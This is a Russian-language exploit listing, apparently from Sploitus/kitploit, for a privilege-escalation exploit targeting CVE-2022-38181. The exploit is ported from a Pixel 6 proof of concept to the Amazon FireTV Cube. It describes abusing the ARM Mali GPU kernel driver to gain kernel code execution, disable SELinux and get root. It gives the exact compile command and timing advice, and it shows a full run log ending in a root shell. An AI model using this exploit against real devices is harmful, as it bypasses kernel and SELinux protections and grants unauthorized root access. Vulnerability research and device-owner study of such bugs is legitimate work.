Sploitus

Exploit for CVE_2022_38181_Gazelle

kitploit · 2026-09-04

Exploit Code

MARKDOWN37 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PRO-ME3US-CVE_2022_38181_GAZELLE
## Эксплойт для CVE-2022-38181 для работы на FireTV 3rd gen Cube

Это форк POC для Pixel 6 от исследователя безопасности Man Yue Mo для CVE_2022_38181. Прочитайте его подробное описание уязвимости здесь. Внесены изменения для учёта 32-битного пользовательского пространства FireOS. POC эксплуатирует ошибку в драйвере ядра ARM Mali для получения произвольного выполнения кода ядра, которое затем используется для отключения SELinux и получения root.

Я использовал следующую команду для компиляции с clang в ndk-21:

root@kitploit:~
    
    
    android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o gazelle_shrinker
    

Для наибольшей надёжности эксплойт следует запускать через 30–90 секунд после загрузки Cube.

root@kitploit:~
    
    
    gazelle:/ $ /data/local/tmp/gazelle_shrinker
    fingerprint: Amazon/gazelle/gazelle:9/PS7613.3701N/0025401652480:user/amz-p,release-keys
    failed, retry.
    failed, retry.
    region freed 47
    alias gpu va 100c83000
    read 0
    cleanup flush region
    release_mem_pool
    jit_freed
    jit_free commit: 6 0
    Found freed_idx 6
    Found pgd 23, 100d30000
    overwrite addr : 104100558 558
    overwrite addr : 104300558 558
    overwrite addr : 10410082c 82c
    overwrite addr : 10430082c 82c
    result 50
    gazelle:/ #